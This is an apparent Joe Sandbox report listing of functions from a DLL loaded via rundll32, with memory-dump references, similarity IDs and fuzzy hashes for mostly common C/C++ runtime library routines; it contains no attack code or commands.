                                                                                                                                                                                                                                                                      Function 000000018001994C Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 192COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Replicator::operator[]
                                                                                                                                                                                                                                                                      • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                                                                                                                                                                                                      • API String ID: 3676697650-3207858774
                                                                                                                                                                                                                                                                      • Opcode ID: 5a260dd3a37411976ea98f4b6fb2ab20663cecc062b10b3ff23bd445ef19509f
                                                                                                                                                                                                                                                                      • Instruction ID: 42aa4a1d08367d9119b1856bc683fc241d67aaeadb9c155bb09d8b169f315b88
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a260dd3a37411976ea98f4b6fb2ab20663cecc062b10b3ff23bd445ef19509f
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2817A32616A8C89FBA2CFA5E4903E837A1A75DBC8F94C116FA4907795DF39C749C340
                                                                                                                                                                                                                                                                      Function 0000000180015478 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 126COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                                                                                      • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                                                                                                                                                                                                      • API String ID: 2943138195-1464470183
                                                                                                                                                                                                                                                                      • Opcode ID: 088971c54ca3ffb1adebbb16f067770a9e4fe21448ff300c31355ef277b9d300
                                                                                                                                                                                                                                                                      • Instruction ID: 86b2220616b80be68583d285cd14afb8824f7222dcd2462d23f21e207e41fe12
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 088971c54ca3ffb1adebbb16f067770a9e4fe21448ff300c31355ef277b9d300
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90514F32610F58C9FB92CB64E8907EC37B2B7183C9FA08015EA895BA98DF35C659C740
                                                                                                                                                                                                                                                                      Function 000000018003D970 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 489COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                      • String ID: -$0$f$p$p
                                                                                                                                                                                                                                                                      • API String ID: 3215553584-1865143739
                                                                                                                                                                                                                                                                      • Opcode ID: 1a16dd49484b322b6fd78fdbbed546c3ccc268b2020a70802ac313a8fc196001
                                                                                                                                                                                                                                                                      • Instruction ID: 634aa9d0042bbda353e8cc45d4c8daf7f92220045ba3d69c75e7207222ffe171
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a16dd49484b322b6fd78fdbbed546c3ccc268b2020a70802ac313a8fc196001
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C412B032A0418D86FBA76E15F0443EB77A1F788B94F96C116F68647AC4DF78C688CB00
                                                                                                                                                                                                                                                                      Function 000000018003E3D4 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 478COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                      • String ID: -$0$f$p$p
                                                                                                                                                                                                                                                                      • API String ID: 3215553584-1865143739
                                                                                                                                                                                                                                                                      • Opcode ID: ff8427b3a9059b88c8ce9f386e4ea062f82f7a66593184870899fb3a07859c96
                                                                                                                                                                                                                                                                      • Instruction ID: 93a9ff39d45d2419c6a7fc755833649a49288bc20d1d0bfe1c27cd3576f2de20
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff8427b3a9059b88c8ce9f386e4ea062f82f7a66593184870899fb3a07859c96
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E612E331A042DA86FBA39B14D0543EB7791F35ABD4F9AC312F696476C4DF38C6888B10
                                                                                                                                                                                                                                                                      Function 0000000180017220 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                                                                                      • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                                                                                                                                                                                      • API String ID: 2943138195-2239912363
                                                                                                                                                                                                                                                                      • Opcode ID: cfb6c385fe5b2ebc5ee7c871daae868a3679fdeefb2062b3cbc30b8eca46961b
                                                                                                                                                                                                                                                                      • Instruction ID: 11c260e0c16152af3f3440f9639a3bccbf9e6650033c1e5fc3f0bfcfe7c7928e
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfb6c385fe5b2ebc5ee7c871daae868a3679fdeefb2062b3cbc30b8eca46961b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30513872B14F5898FB928B60D8803ED77B0B70C788F548125EE5923B96DF788389C710
                                                                                                                                                                                                                                                                      Function 000000018002068C Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 475COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                      • String ID: -$f$p$p
                                                                                                                                                                                                                                                                      • API String ID: 3215553584-2516539321
                                                                                                                                                                                                                                                                      • Opcode ID: 19540540e18a12fbd70b594dd22ebd52cf533dd5dd11ba696ac90525da22a166
                                                                                                                                                                                                                                                                      • Instruction ID: 3b4b050498cdcb5f336cd356739b46ea81abb083d02af334d156d32d0928b2a6
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19540540e18a12fbd70b594dd22ebd52cf533dd5dd11ba696ac90525da22a166
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B12A27160438A86FBA39B14E0447EA7762F3587D4FF4C115F6D246AC6DF39CA888B05
                                                                                                                                                                                                                                                                      Function 000000018000C928 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                      • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                                      • Opcode ID: 8152444fde3df33d3fc19ab23fa89504be66b01d467fa357cf36183d89cc0f39
                                                                                                                                                                                                                                                                      • Instruction ID: d2b285feaf2a7c9902849b73c345f52bfdc77f3075a64cd68fdca09590970db2
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8152444fde3df33d3fc19ab23fa89504be66b01d467fa357cf36183d89cc0f39
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23D18D32604B488AEBA2DB25D4807DD3BA0F7497C8F008216FF8957B96CF34D689C701
                                                                                                                                                                                                                                                                      Function 000000018004816C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00000001800485F8,?,?,00000000,00000001800473F0,?,?,?,000000018003FF1D), ref: 00000001800482EB
                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00000001800485F8,?,?,00000000,00000001800473F0,?,?,?,000000018003FF1D), ref: 00000001800482F7
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                      • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                                      • Opcode ID: 0d299566b81bc57299c7a1d78208d6e8857f952c1b81df691ed9895207af2ff4
                                                                                                                                                                                                                                                                      • Instruction ID: 950cb933599524e4be349329b0f14d28e915af748e4a11c5b25ef056b0586ea4
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d299566b81bc57299c7a1d78208d6e8857f952c1b81df691ed9895207af2ff4
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C941F231311E0881FAA7CB16AD403DA2396BB4DBE4F49C925BE1A97784EE3CC64D9344
                                                                                                                                                                                                                                                                      Function 0000000273F41740 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 115COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3331451655.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331409929.0000000273F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331451655.0000000273F85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_273f40000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: QueryVirtual
                                                                                                                                                                                                                                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                                                                                                                                                                                      • API String ID: 1804819252-1534286854
                                                                                                                                                                                                                                                                      • Opcode ID: 0cce06267e1579f90ae27719d32f235d794723324326edd454bf682594529e94
                                                                                                                                                                                                                                                                      • Instruction ID: 663189738c40874af7135dc25b0b982f4eec5aa8fa6ad61ed8319b582aa1f326
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0cce06267e1579f90ae27719d32f235d794723324326edd454bf682594529e94
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB41AF72F08F4482EB14DB51E8497DA77A0F789BE0F644220DA4D07BA5EB38C685E742
                                                                                                                                                                                                                                                                      Function 0000000180048428 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77libraryloaderCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                      • API String ID: 2559590344-537541572
                                                                                                                                                                                                                                                                      • Opcode ID: 5f731d081a05f6a95782ac3a15dc747bbdcc723eeb0ed29383746bad62b9c2d4
                                                                                                                                                                                                                                                                      • Instruction ID: 0e08bba11ac0ad9f6f6124514d17085406b5fd0418ae2fa010a6a0cc5cd50d11
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f731d081a05f6a95782ac3a15dc747bbdcc723eeb0ed29383746bad62b9c2d4
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C31A031711E0581EBA39B16984039D63A4BB4CBE4F5D8A25BF2A437D5EF38CA498308
                                                                                                                                                                                                                                                                      Function 0000000180007470 Relevance: 12.2, APIs: 8, Instructions: 234threadCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Thread$Current$Context
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1666949209-0
                                                                                                                                                                                                                                                                      • Opcode ID: 03aea4405d3ee7ac1ce51f989aca9336de7ed29b735687dc17f6ff6147a09d28
                                                                                                                                                                                                                                                                      • Instruction ID: de2e915fae306b5b51e8ed7498582b349e8bb643afe958a96c2b02e58ec33d63
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03aea4405d3ee7ac1ce51f989aca9336de7ed29b735687dc17f6ff6147a09d28
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13D17976609B8882DAB1DB0AE49439A77A0F39CBC5F108216FACD477A5CF7DC655CB00
                                                                                                                                                                                                                                                                      Function 0000000180019740 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                                                                                      • String ID: {for
                                                                                                                                                                                                                                                                      • API String ID: 2943138195-864106941
                                                                                                                                                                                                                                                                      • Opcode ID: 0c0d30ad377e4ea5a3451009b1db462a15400a07ebc6bc3e0ddb6c2557d9ff17
                                                                                                                                                                                                                                                                      • Instruction ID: 495a72a0baf00997086ff0ea6129483d1001404d3758be8f7ad89a7954a2554b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c0d30ad377e4ea5a3451009b1db462a15400a07ebc6bc3e0ddb6c2557d9ff17
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9513A72605B88A9FB92DF68D4803EC77A1E349788F84D015FA485BB99DF78C799C340
                                                                                                                                                                                                                                                                      Function 0000000180015AE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
